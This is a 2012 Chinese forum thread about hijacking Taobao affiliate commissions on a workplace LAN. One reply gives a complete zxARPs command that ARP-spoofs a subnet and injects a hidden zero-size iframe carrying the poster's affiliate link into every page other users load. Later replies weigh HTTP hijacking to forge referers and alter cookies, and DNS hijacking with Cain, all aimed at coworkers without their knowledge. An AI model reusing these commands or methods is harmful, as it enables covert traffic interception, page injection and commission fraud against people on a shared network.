设为首页收藏本站

简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย Français

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
楼主: fated

可不可以替换局域网内的淘宝客ID?

[复制链接]

29

主题

497

回帖

1153

积分

金牌会员

积分
1153
发表于 2012-12-5 15:57:00 | 显示全部楼层
zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包,没有它zxARPs就运行不了。
安装好后将zxARPs放到任意目录,然后运行“命令提示符”,进入zxARPs所在的目录,然后输入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "<iframe src='淘宝客链接' width=0 height=0>"。回车后挂马就成功了。
从现在开始,局域网中的用户无论访问什么网站,都会运行我们的淘宝客,因为zxARPs在用户打开网页的同时已经将淘宝客代码插入到正常网页中了
回复

使用道具 举报

29

主题

621

回帖

1405

积分

金牌会员

积分
1405
发表于 2012-12-5 15:57:36 | 显示全部楼层
综合了下大家和我自己的想法。我还是觉得做http劫持才是最靠谱,这样可以伪造http reffer,可以更改cookie,可以替换url。不过这个要在公司内部搞风险太大,除非能跟做客户端维护的同事分一杯羹,另外程序难度太大,cookie这块肯定有加过密,所以要搞topl兄说的cookie这块估计搞不了,这个就相当于放弃挤掉其他淘宝客的ID了。
zhucy兄所说的天猫跳转我先试试,这个我已经小试了下,貌似跳转没有问题,可惜集市不能全站。但是我对这种方法的效果持保留意见,因为据说最新升级后的推广链接必须是未解密前的地址,也就是s.click和s8.click开头的地址才有效。当你在地址栏输入加密地址完全打开页面后所出现的地址,有人说现在是没有推广效果的。难道这是因为像wdlth兄说的那样,淘宝在解密地址的时候有做http reffer判断?但是我觉得这个判断对于橱窗和搜索点击才有用吧,单品和店铺推广没有意义,因为这两个地址是可以发布在任何地方进行推介的。
回复

使用道具 举报

207

主题

2050

回帖

4783

积分

论坛元老

积分
4783
发表于 2012-12-5 17:54:54 | 显示全部楼层
ARP欺骗,将淘宝的地址替换成带淘宝客的链接
回复

使用道具 举报

29

主题

497

回帖

1153

积分

金牌会员

积分
1153
发表于 2012-12-5 18:47:16 | 显示全部楼层

riskstar 发表于 2012-12-6 08:23



zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包, ...

流弊~~~~~~~~~~~!!!!!
回复

使用道具 举报

201

主题

748

回帖

2139

积分

金牌会员

积分
2139
发表于 2012-12-5 19:00:16 | 显示全部楼层
看看
回复

使用道具 举报

0

主题

1

回帖

4

积分

新手上路

积分
4
发表于 2012-12-5 19:02:00 | 显示全部楼层
如果有那种行为控制的路由器就可以
回复

使用道具 举报

62

主题

1179

回帖

2772

积分

金牌会员

积分
2772
发表于 2012-12-5 19:02:23 | 显示全部楼层

riskstar 发表于 2012-12-6 08:23



zxARPs,是一个通过ARP欺骗实现局域网挂马的工具。在使用zxARPs前我们要安装WinPcap,它是网络底层驱动包, ...

能否在路由器镜像端口做?
回复

使用道具 举报

27

主题

316

回帖

771

积分

高级会员

积分
771
发表于 2012-12-5 19:02:45 | 显示全部楼层

dalky 发表于 2012-12-7 10:17



dns如何劫持?局域网内有自己的dns

百度一下"Cain DNS劫持"
回复

使用道具 举报

62

主题

1179

回帖

2772

积分

金牌会员

积分
2772
发表于 2012-12-5 19:28:11 | 显示全部楼层

dalky 发表于 2012-12-6 11:37



能否在路由器镜像端口做?

镜像端口只是复制一份被镜像端口的数据,无法通过端口镜像实现劫持。
另一种思路是DNS劫持
riskstar 发表于 2012-12-6 13:14



镜像端口只是复制一份被镜像端口的数据,无法通过端口镜像实现劫持。
另一种思路是DNS劫持 ...

dns如何劫持?局域网内有自己的dns
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2026-7-12 08:42 , Processed in 0.016373 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表